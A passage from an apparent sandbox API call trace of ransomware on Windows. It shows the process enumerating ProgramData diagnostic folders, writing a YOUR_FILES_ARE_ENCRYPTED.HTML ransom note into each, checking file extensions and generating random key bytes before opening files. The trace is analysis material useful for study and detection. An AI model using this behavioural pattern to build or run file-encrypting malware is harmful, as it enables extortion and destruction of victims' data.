returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\*" [0106.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.279] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.279] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36f2be13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x36f2be13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="AutoLogger", cAlternateFileName="AUTOLO~1")) returned 1 [0106.279] StrStrIW (lpFirst="AutoLogger", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.279] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned 57 [0106.279] GetProcessHeap () returned 0x600000 [0106.280] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.280] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger" [0106.280] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*" [0106.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc088dfed, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.280] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc088dfed, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0106.281] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xc088dfed, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x4b28b40c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 1 [0106.281] StrStrIW (lpFirst="AutoLogger-Diagtrack-Listener.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.281] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl") returned 91 [0106.281] PathFindExtensionW (pszPath="AutoLogger-Diagtrack-Listener.etl") returned=".etl" [0106.281] lstrlenW (lpString=".etl") returned 4 [0106.281] PathFindExtensionW (pszPath="AutoLogger-Diagtrack-Listener.etl") returned=".etl" [0106.281] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xc088dfed, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x4b28b40c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 0 [0106.281] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.281] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0106.281] GetProcessHeap () returned 0x600000 [0106.281] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.281] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\autologger\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.282] WriteFile (in: hFile=0x304, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.283] CloseHandle (hObject=0x304) returned 1 [0106.284] GetProcessHeap () returned 0x600000 [0106.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.284] GetProcessHeap () returned 0x600000 [0106.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.284] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 1 [0106.284] StrStrIW (lpFirst="ShutdownLogger", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.284] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned 61 [0106.284] GetProcessHeap () returned 0x600000 [0106.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.286] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger" [0106.286] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*" [0106.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0106.286] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0106.286] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 0 [0106.286] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0106.286] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0106.286] GetProcessHeap () returned 0x600000 [0106.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.286] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.287] WriteFile (in: hFile=0x304, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.288] CloseHandle (hObject=0x304) returned 1 [0106.289] GetProcessHeap () returned 0x600000 [0106.289] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.289] GetProcessHeap () returned 0x600000 [0106.289] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.289] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 0 [0106.289] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.290] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0106.290] GetProcessHeap () returned 0x600000 [0106.290] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.290] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.293] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.294] CloseHandle (hObject=0x314) returned 1 [0106.294] GetProcessHeap () returned 0x600000 [0106.294] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.294] GetProcessHeap () returned 0x600000 [0106.294] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf380d4, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf380d4, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3000000, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="events00.rbs", cAlternateFileName="")) returned 1 [0106.296] StrStrIW (lpFirst="events00.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.296] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\events00.rbs") returned 51 [0106.296] PathFindExtensionW (pszPath="events00.rbs") returned=".rbs" [0106.296] lstrlenW (lpString=".rbs") returned 4 [0106.296] PathFindExtensionW (pszPath="events00.rbs") returned=".rbs" [0106.296] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc28f5c, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="events01.rbs", cAlternateFileName="")) returned 1 [0106.296] StrStrIW (lpFirst="events01.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.296] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\events01.rbs") returned 51 [0106.296] PathFindExtensionW (pszPath="events01.rbs") returned=".rbs" [0106.296] lstrlenW (lpString=".rbs") returned 4 [0106.296] PathFindExtensionW (pszPath="events01.rbs") returned=".rbs" [0106.296] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf5c28, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="events10.rbs", cAlternateFileName="")) returned 1 [0106.296] StrStrIW (lpFirst="events10.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.296] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\events10.rbs") returned 51 [0106.296] PathFindExtensionW (pszPath="events10.rbs") returned=".rbs" [0106.296] lstrlenW (lpString=".rbs") returned 4 [0106.296] PathFindExtensionW (pszPath="events10.rbs") returned=".rbs" [0106.296] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2e147a, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="events11.rbs", cAlternateFileName="")) returned 1 [0106.297] StrStrIW (lpFirst="events11.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.297] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\events11.rbs") returned 51 [0106.297] PathFindExtensionW (pszPath="events11.rbs") returned=".rbs" [0106.297] lstrlenW (lpString=".rbs") returned 4 [0106.297] PathFindExtensionW (pszPath="events11.rbs") returned=".rbs" [0106.297] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="LocalTraceStore", cAlternateFileName="LOCALT~1")) returned 1 [0106.297] StrStrIW (lpFirst="LocalTraceStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.297] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore") returned 54 [0106.297] GetProcessHeap () returned 0x600000 [0106.297] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.298] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore" [0106.298] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\*" [0106.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.299] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 0 [0106.299] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.299] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0106.299] GetProcessHeap () returned 0x600000 [0106.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.300] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\localtracestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.300] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.301] CloseHandle (hObject=0x314) returned 1 [0106.302] GetProcessHeap () returned 0x600000 [0106.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.302] GetProcessHeap () returned 0x600000 [0106.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.303] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd17b1a49, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x36edfa80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="parse.dat", cAlternateFileName="")) returned 1 [0106.303] StrStrIW (lpFirst="parse.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.303] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\parse.dat") returned 48 [0106.303] PathFindExtensionW (pszPath="parse.dat") returned=".dat" [0106.303] lstrlenW (lpString=".dat") returned 4 [0106.303] PathFindExtensionW (pszPath="parse.dat") returned=".dat" [0106.303] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0106.303] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\parse.dat" (normalized: "c:\\programdata\\microsoft\\diagnosis\\parse.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.303] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Sideload", cAlternateFileName="")) returned 1 [0106.304] StrStrIW (lpFirst="Sideload", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.304] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload") returned 47 [0106.304] GetProcessHeap () returned 0x600000 [0106.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.305] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload" [0106.305] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\*" [0106.305] FindFirstFileW (in: 